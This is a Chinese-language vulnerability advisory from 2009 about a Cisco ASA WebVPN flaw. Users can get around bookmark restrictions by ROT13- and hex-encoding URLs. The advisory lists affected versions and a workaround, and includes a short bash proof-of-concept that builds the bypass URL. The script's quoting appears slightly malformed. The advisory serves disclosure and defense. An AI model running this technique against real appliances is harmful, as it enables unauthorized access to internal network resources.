Cisco ASA WebVPN书签功能绕过安全限制漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2009-12-23
Cisco ASA WebVPN书签功能绕过安全限制漏洞 受影响系统:

Cisco ASA 8.2
Cisco ASA 8.1
Cisco ASA 8.0
Cisco ASA 7.2
Cisco ASA 7.1
Cisco ASA 7.0
描述:


--------------------------------------------------------------------------------

Cisco自适应安全设备(ASA)是可提供安全和VPN服务的模块化平台。

Cisco ASA为管理员提供了无客户端SSL VPN会话以访问公司资源的选项,其中一个功能是可以通过向登录页面添加书签来自定义WebVPN portal页面。书签中的链接(URL)使用ROT13替换进行了混淆,并将ASCII字符转换为了16进制。拥有有效账号但没有URL entry的用户可以使用ROT13加密URL、将ASCII字符转换为16进制并将这个字符串附加到Cisco VPN SSL URL就可以访问任意内部或外部资源。

<*来源:David Eduardo Acosta Rodrguez (deacosta@isecauditors.com)
  
  链接:http://secunia.com/advisories/37710/
        http://marc.info/?l=bugtraq&m=126106497327046&w=2
        http://tools.cisco.com/security/center/viewAlert.x?alertId=19609
*>

测试方法:


--------------------------------------------------------------------------------


警 告

以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!

 


#!/bin/bash
echo -n "write URL:"
read a
b=`echo -n $a | tr ’[a-m][n-z][A-M][N-Z]’ ’[n-z][a-m][N-Z][A-M]’ | od
-tx1 | cut  -c8- | sed ’s/ //g’` | paste -s -d ’’;
echo -n "URL "
echo -n "https://[CISCOVPNSSL]/+CSCO+00"; echo -n $b; echo -n "++";
echo "";

建议:


--------------------------------------------------------------------------------

临时解决方法:

* 设置webtype ACL和filter阻断Web VPN SSL中的访问。

厂商补丁:

Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.cisco.com/warp/public/707/advisory.html

图片内容